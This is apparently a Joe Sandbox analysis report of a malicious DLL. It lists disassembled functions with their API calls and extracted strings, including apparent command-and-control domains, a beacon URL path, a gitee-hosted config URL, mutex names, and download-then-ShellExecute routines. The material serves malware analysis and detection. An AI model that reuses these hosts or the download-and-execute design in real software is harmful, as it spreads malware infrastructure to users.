Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ErrorLast_sprintf$_memmove$HttpOpenOptionRequest$ConnectSend
String ID: Content-Type: application/json;charset=UTF-8$POST
API String ID: 1869983202-4011478237
Opcode ID: c25ce35a2a16a70e4361e8997c3c43b363ad9ca9d3b13bd1e9f88059e6eb9754
Instruction ID: a2ba4f0a9c13a3d423ae63a4d74ca6f88612a5428f9d2dfc1c4a3448f85b64bd
Opcode Fuzzy Hash: c25ce35a2a16a70e4361e8997c3c43b363ad9ca9d3b13bd1e9f88059e6eb9754
Instruction Fuzzy Hash: DD025A708043599FEF26DFA4CC94BEEBBB5FF09305F104169E845AB282DB715948CBA1

Function 100106D1 Relevance: 42.5, APIs: 12, Strings: 12, Instructions: 475sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100106D6

Part of subcall function 100151F7: __EH_prolog.LIBCMT ref: 100151FC
Part of subcall function 100151F7: GetTempPathA.KERNEL32(00000104,?,1005D0F4,?,1005D0F4,00000000,1005AF8C,?,1005AF8C,00000000,c:\,?,000001C8,?), ref: 100152A2

_sprintf.LIBCMT ref: 100107A9
_sprintf.LIBCMT ref: 100107E2
_sprintf.LIBCMT ref: 1001083E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000001C8,?), ref: 1001085E
_sprintf.LIBCMT ref: 1001092B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 1001098D
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100109BD
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 100109DC
_malloc.LIBCMT ref: 100109F9
_sprintf.LIBCMT ref: 10010A18
_free.LIBCMT ref: 10010A5C

Strings

don't have function name,only loadlibray main., xrefs: 10010D58, 10010D5D, 10010D65
c:\%s, xrefs: 100107A3
DLL inside run failed., xrefs: 10010C77, 10010C7C, 10010C84
-R %s, xrefs: 10010925
URL Address open failed., xrefs: 10010B3C, 10010B5C
open, xrefs: 10010987, 100109D5
isnull, xrefs: 10010C18, 10010C24
Run timeout,path:%s param:%s code:%d, xrefs: 10010A12
wb+, xrefs: 100107EA, 100107F5, 1001084C
%s%s, xrefs: 100107DC
C:\Program Files (x86)\Internet Explorer\%s, xrefs: 10010838
Memory loading failed., xrefs: 10010CCF, 10010CFA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _sprintf$ExecuteH_prologShell$ErrorLastPathSleepTemp_free_malloc
String ID: %s%s$-R %s$C:\Program Files (x86)\Internet Explorer\%s$DLL inside run failed.$Memory loading failed.$Run timeout,path:%s param:%s code:%d$URL Address open failed.$c:\%s$don't have function name,only loadlibray main.$isnull$open$wb+
API String ID: 511354059-3804541553
Opcode ID: b5584df9892dddf49a48d71b8597b417fae9e67d29596936f68adca9d55465a3
Instruction ID: 5d0e6c07e2bd914c6a5e838715f5ec936c7744656dec28dfbd057ca5cb6c25ae
Opcode Fuzzy Hash: b5584df9892dddf49a48d71b8597b417fae9e67d29596936f68adca9d55465a3
Instruction Fuzzy Hash: 20029475A00209AFEB14CFA8CD95FEA77B8EF04344F508169F9459B142DB71FA84CB91

Function 10031740 Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 315networkfileCOMMON

Download Yara Rule

APIs

DeleteUrlCacheEntryA.WININET(?,93656AD3), ref: 100317A3
InternetOpenA.WININET(1005ADE8,00000000,00000000,00000000,00000000), ref: 100317B6
GetLastError.KERNEL32 ref: 100317C9
_sprintf.LIBCMT ref: 100317F8
InternetCloseHandle.WININET(00000000), ref: 10031828
_memmove.LIBCMT ref: 10031853
InternetSetOptionA.WININET(00000000,00000006,000007D0,00000004), ref: 10031888
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 100318A3
GetLastError.KERNEL32 ref: 100318B2
_sprintf.LIBCMT ref: 100318E3
InternetCloseHandle.WININET(00000000), ref: 1003191D
_malloc.LIBCMT ref: 1003192B
InternetReadFile.WININET(00000000,00000000,00000004,?), ref: 10031951
_memmove.LIBCMT ref: 100319AF
_memmove.LIBCMT ref: 10031A21
_free.LIBCMT ref: 10031A99
InternetCloseHandle.WININET(?), ref: 10031AAA
InternetCloseHandle.WININET(?), ref: 10031AAF
_memmove.LIBCMT ref: 10031AD6

Strings

string too long, xrefs: 10031AE3
err:%d, xrefs: 100317D6

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle_memmove$ErrorLastOpen_sprintf$CacheDeleteEntryFileOptionRead_free_malloc
String ID: err:%d$string too long
API String ID: 642120794-359996798
Opcode ID: 230a4bdf5c9208eb397ffb3ac3648132603d5f267f577f08ae302a3db7a50645
Instruction ID: c9902eeee73dfb2a9aea22659707d2f3242f34e170a4351108a671e78f6adc02
Opcode Fuzzy Hash: 230a4bdf5c9208eb397ffb3ac3648132603d5f267f577f08ae302a3db7a50645
Instruction Fuzzy Hash: 34C19071D01649EFEB16CFA4DC84BDEBBB9FF08301F20812AE412AB281D7716945CB91

Function 10002B14 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 179networkfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10002B19
DeleteUrlCacheEntryA.WININET(?,00000001,00000000), ref: 10002B51
InternetOpenA.WININET(1005ADE8,00000000,00000000,00000000,00000000), ref: 10002B62
GetLastError.KERNEL32(?,00000001,00000000), ref: 10002B71
_sprintf.LIBCMT ref: 10002B94
InternetCloseHandle.WININET(00000000), ref: 10002BB4
InternetSetOptionA.WININET(00000000,00000006,000007D0,00000004), ref: 10002BC8
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10002BE2
GetLastError.KERNEL32(?,00000000,00000000,80000000,00000000,?,00000001,00000000), ref: 10002BEF
_sprintf.LIBCMT ref: 10002C12
InternetCloseHandle.WININET(00000010), ref: 10002C39
_malloc.LIBCMT ref: 10002C48

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

InternetReadFile.WININET(?,00000000,00000004,00000000), ref: 10002C6A
_free.LIBCMT ref: 10002CCC
InternetCloseHandle.WININET(00000010), ref: 10002CDC
InternetCloseHandle.WININET(?), ref: 10002CE1

Strings

w/master/raidjsonapi.cpp, xrefs: 10002C9B, 10002CB1
err:%d, xrefs: 10002B8E

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ErrorLastOpen_sprintf$AllocateCacheDeleteEntryFileH_prologHeapOptionRead_free_malloc
String ID: err:%d$w/master/raidjsonapi.cpp
API String ID: 1818718819-3113852033
Opcode ID: 9f84d3543bb3c49a6a5b715114175bd1e5ca8334e16b1c2dd3a5e4a8baff636a
Instruction ID: 50a741a943d7cd08b720c4cc8e4f8951a50192857fbd78911610896b0dbd9278
Opcode Fuzzy Hash: 9f84d3543bb3c49a6a5b715114175bd1e5ca8334e16b1c2dd3a5e4a8baff636a
Instruction Fuzzy Hash: 93515D71C00219AFEB11DBA4CC45BEEBBBCEF48350F204429F905E7256DB746A08CBA1

Function 100154F5 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 164synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100154FA

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 10015565
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634
CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015649
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015650
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 10015665
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015673
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 1001567B
CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015683

Strings

13a.dh7483y.com, xrefs: 10015554
%s%s%saz$%^$%@#sdfs_12, xrefs: 1001555F
sadfasdf, xrefs: 10015575, 1001557A, 10015582

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
String ID: %s%s%saz$%^$%@#sdfs_12$13a.dh7483y.com$sadfasdf
API String ID: 2639461599-2215545067
Opcode ID: 1518ece147888d06eb28e1bab33ca1dda2ae3e3787e08298007f95db480e2bae
Instruction ID: e3f48761596626cd4d4354f5a4ff52278281e6d761e45354df657ce548eb757b
Opcode Fuzzy Hash: 1518ece147888d06eb28e1bab33ca1dda2ae3e3787e08298007f95db480e2bae
Instruction Fuzzy Hash: 575160B1900218EFEB11DFA4CC959EDBBBCEF08350F54042AE505A7152D771AA45CFA5

Function 1001DBB2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 247networksleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1001DBE3

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1001DBF0
socket.WS2_32(00000002,00000002,00000011), ref: 1001DC0E
WSAGetLastError.WS2_32 ref: 1001DC1F
htons.WS2_32(?), ref: 1001DC3F
inet_addr.WS2_32(00000000), ref: 1001DC5F
setsockopt.WS2_32 ref: 1001DC92
setsockopt.WS2_32(0000FFFF,0000FFFF,00001006,?,00000004), ref: 1001DCA9
Sleep.KERNEL32(00000000,hreq,00000000,?,hres,00000000), ref: 1001DD41
sendto.WS2_32(?,?,?,00000000,?,?), ref: 1001DD8B
WSAGetLastError.WS2_32 ref: 1001DD96
recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001DDBF
inet_ntoa.WS2_32(?), ref: 1001DDCE
_memcmp.LIBCMT ref: 1001DE4E

Strings

hres, xrefs: 1001DCE7, 1001DCF3
ccht, xrefs: 1001DE48
hreq, xrefs: 1001DD0B, 1001DD10, 1001DD20

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastTimesetsockopt$FileSleepSystem__aulldiv__time64_memcmp_randhtonsinet_addrinet_ntoarecvfromsendtosocket
String ID: ccht$hreq$hres
API String ID: 77764386-3895697549
Opcode ID: 60279af41891f6b088b8d9653c596f09ee8966f245381f0cf8b45bc7c9cf3f26
Instruction ID: 5b83e77b3cde625a7e5fbc45e1b969dd0d46cb07dd602809bcd323590f17d49f
Opcode Fuzzy Hash: 60279af41891f6b088b8d9653c596f09ee8966f245381f0cf8b45bc7c9cf3f26
Instruction Fuzzy Hash: B191C071508341AFE310FB60DC85BAAB7E8EF54351F40492AF585CB1E1EB71E989CB92

Function 1000DB5E Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 155networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000DB63
gethostbyname.WS2_32(wktcp.61611.live), ref: 1000DB78
inet_addr.WS2_32(127.0.0.1), ref: 1000DBA7
inet_addr.WS2_32(127.0.0.0), ref: 1000DBB2
inet_addr.WS2_32(0.0.0.0), ref: 1000DBBD
inet_addr.WS2_32(114.114.114.114), ref: 1000DC08
inet_addr.WS2_32(?), ref: 1000DC75

Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218

Strings

wktcp.61611.live, xrefs: 1000DB70, 1000DBFA, 1000DC13
127.0.0.1, xrefs: 1000DB9F
114.114.114.114, xrefs: 1000DBFF
CName%d = %s, xrefs: 1000DCAA
127.0.0.0, xrefs: 1000DBAD
0.0.0.0, xrefs: 1000DBB8
DNSLookup2 result (%s):, xrefs: 1000DC18
IP%d(string) = %s, xrefs: 1000DC58

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: inet_addr$H_prolog$gethostbyname
String ID: 0.0.0.0$114.114.114.114$127.0.0.0$127.0.0.1$CName%d = %s$DNSLookup2 result (%s):$IP%d(string) = %s$wktcp.61611.live
API String ID: 2362621887-2449872679
Opcode ID: 82a042206518e83c2ccd3ba523b22199bff41905fed9c617c79086a254f7e434
Instruction ID: fb56de858478cce894448d15b18088730dc155a2225b55e9ecbf044c5fcc7fa9
Opcode Fuzzy Hash: 82a042206518e83c2ccd3ba523b22199bff41905fed9c617c79086a254f7e434
Instruction Fuzzy Hash: CE514F75D1021AEFEB14DFA8DC91DEDBBB5FF44290F20412AE402A7255DB70AA44CFA1

Function 100087E9 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 189sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100087EE
__time64.LIBCMT ref: 10008822

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1000882F
__time64.LIBCMT ref: 10008838

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 1000889F

Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473

_strstr.LIBCMT ref: 10008A15
_memmove.LIBCMT ref: 10008A51
Sleep.KERNEL32(00001388), ref: 10008A6E

Strings

[SERVER] GetSystemConfiG res:%s, xrefs: 10008AB6
/index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld, xrefs: 10008899
api.5566331.com, xrefs: 100088CB, 10008A24, 10008A4C
https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cpp, xrefs: 1000898F, 10008995

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$Time__time64$FileSleepSystem__aulldiv_memmove_rand_sprintf_strstr
String ID: /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld$[SERVER] GetSystemConfiG res:%s$api.5566331.com$https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cpp
API String ID: 1127589319-1662654624
Opcode ID: 266c2795f8b2a94bdbc6c10271b49fc0f966e2b4292bc8d780b13eb92134bc73
Instruction ID: 24a5ebd035d5e92a78baa848362d5051307424672981ef701fa1a64b86c1e668
Opcode Fuzzy Hash: 266c2795f8b2a94bdbc6c10271b49fc0f966e2b4292bc8d780b13eb92134bc73
Instruction Fuzzy Hash: A4815EB5D042589EEB24DFA4CC41BDEBBB8FF14340F508599E509AB246DB706B84CFA1

Function 1000297B Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 142networkfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10002980
_malloc.LIBCMT ref: 100029AD
InternetOpenA.WININET(RookIE/1.0,00000000,00000000,00000000,00000000), ref: 100029D0
InternetSetOptionA.WININET(00000000,00000006,000007D0,00000004), ref: 100029EC
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000000,00000000), ref: 10002A00
HttpQueryInfoA.WININET(00000000,00000005,?,?,?), ref: 10002A36
InternetReadFile.WININET(?,?,?,00000001), ref: 10002A77
InternetCloseHandle.WININET(?), ref: 10002AD6
InternetCloseHandle.WININET(00000000), ref: 10002AE0
_free.LIBCMT ref: 10002AFC

Strings

, xrefs: 10002A2F
RookIE/1.0, xrefs: 100029BC

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileH_prologHttpInfoOptionQueryRead_free_malloc
String ID: $RookIE/1.0
API String ID: 3800676648-2743260696
Opcode ID: 57a82b4d4ddf381701bd030490dc1e76e59a2477cf2e1381f9ec5e6719aa71e3
Instruction ID: 60be78cb3456d9a8e6995664e1d177457c95fe33f50e6e38e60124fae310fd8d
Opcode Fuzzy Hash: 57a82b4d4ddf381701bd030490dc1e76e59a2477cf2e1381f9ec5e6719aa71e3
Instruction Fuzzy Hash: 2A514871E00219AFEF11CFA4CC85BEEBBB8FB48351F204129F501F6294DB75AA058B61

Function 1001045E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 54networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727),00000001,00000000,00000000,00000000), ref: 1001046F
GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 1001047B
_wprintf.LIBCMT ref: 10010487
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000400,00000000), ref: 1001049C
GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 100104A6
_wprintf.LIBCMT ref: 100104B2
InternetCloseHandle.WININET(00000000), ref: 100104BA

Strings

InternetOpenUrl error: %d, xrefs: 100104AD
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727), xrefs: 1001046A
InternetOpen error: %d, xrefs: 10010482

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Internet$ErrorLastOpen_wprintf$CloseHandle
String ID: InternetOpen error: %d$InternetOpenUrl error: %d$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
API String ID: 4184951356-3019792808
Opcode ID: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
Instruction ID: fdd271cfc1952d43686e52e3cb2134a55a55c06e4c3b67e23485a96a698a7243
Opcode Fuzzy Hash: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
Instruction Fuzzy Hash: FE018F722015347BE720A7F59C8DDAB7F1CEF426B1F118109FB0896260DA609840C6E5

Function 1003C76F Relevance: 19.6, APIs: 13, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,1003666B,1005F5F8,00000008), ref: 1003C777
_free.LIBCMT ref: 1003C790

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_free.LIBCMT ref: 1003C7A3
_free.LIBCMT ref: 1003C7C1
_free.LIBCMT ref: 1003C7D3
_free.LIBCMT ref: 1003C7E4
_free.LIBCMT ref: 1003C7EF
_free.LIBCMT ref: 1003C811
EncodePointer.KERNEL32(000000FF), ref: 1003C819
_free.LIBCMT ref: 1003C82E
_free.LIBCMT ref: 1003C844
InterlockedDecrement.KERNEL32 ref: 1003C856
_free.LIBCMT ref: 1003C870

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
String ID:
API String ID: 4264854383-0
Opcode ID: afd15cdc7ab4b273743eefa47ed2bf7ae6b5034d1a0428082421af12fd767f58
Instruction ID: 79696616e0b730dd919b1f1cbee781b66b56706a222b501a3b1922b7791e6efb
Opcode Fuzzy Hash: afd15cdc7ab4b273743eefa47ed2bf7ae6b5034d1a0428082421af12fd767f58
Instruction Fuzzy Hash: 1A217136801221DFE702DF16DCC4919B7E6FB45766F25822EE8089F261EBB56C80CF50

Function 1000800D Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 208COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10008012
htonl.WS2_32(?), ref: 10008068
